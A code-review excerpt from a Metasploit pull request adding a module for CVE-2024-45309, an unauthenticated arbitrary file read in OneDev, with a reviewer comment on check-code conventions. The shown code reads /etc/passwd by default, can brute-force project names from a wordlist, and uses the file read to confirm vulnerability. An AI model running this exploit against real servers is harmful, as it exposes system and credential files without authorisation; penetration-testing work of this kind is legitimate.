modules/auxiliary/gather/onedev_arbitrary_file_read.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OneDev Unauthenticated Arbitrary File Read',
+        'Description' => %q{
+          This module exploits an unauthenticated arbitrary file read vulnerability (CVE-2024-45309), which affects OneDev versions <= 11.0.8.
+          To exploit this vulnerability, a valid OneDev project name is required. If anonymous access is enabled on the OneDev server, any visitor
+          can view existing projects without authentication.
+          However, when anonymous access is disabled, an attacker who lacks prior knowledge of existing project names can use a brute-force approach.
+          By providing a user-supplied wordlist, the module may be able to guess a valid project name and subsequently exploit the vulnerability.
+        },
+        'Author' => [
+          'vultza', # metasploit module
+          'Siebene' # vuln discovery
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-45309'],
+          ['URL', 'https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489']
+        ],
+        'DisclosureDate' => '2024-10-19',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The relative URI of the OneDev instance', '/']),
+        OptString.new('TARGETFILE', [true, 'The absolute file path to read', '/etc/passwd']),
+        OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', false]),
+        OptString.new('PROJECT_NAME', [true, 'The target OneDev project name', '']),
+        OptPath.new('PROJECT_NAMES_FILE', [
+                      false, 'File containing project names to try, one per line',
+                      File.join(Msf::Config.data_directory, 'wordlists', 'namelist.txt')
+                    ])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    return CheckCode::Unknown('Request failed') unless res
+
+    unless ["OneDev", "var redirect = '/~login';"].any? { |f| res.body.include? f }
+      return CheckCode::Unknown("The target isn't a OneDev instance.")
+    end
+
+    version = res.body.scan(/OneDev ([\d.]+)/).first
+
+    if version.nil?
+      if datastore['PROJECT_NAME']
+        res = read_file(datastore['PROJECT_NAME'], '/etc/passwd')
+        
+        if res.body.include? 'root:x:0:0:root:'
+          return CheckCode::Appears("OneDev instance is vulnerable.")
```

Comment:
We reserve the CheckCode `Appears` for version checks and `Vulnerable` for when you actually successfully exploit the vulnerability in the check method.  [More info](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes)
```suggestion
          return CheckCode::Vulnerable("OneDev instance is vulnerable.")
```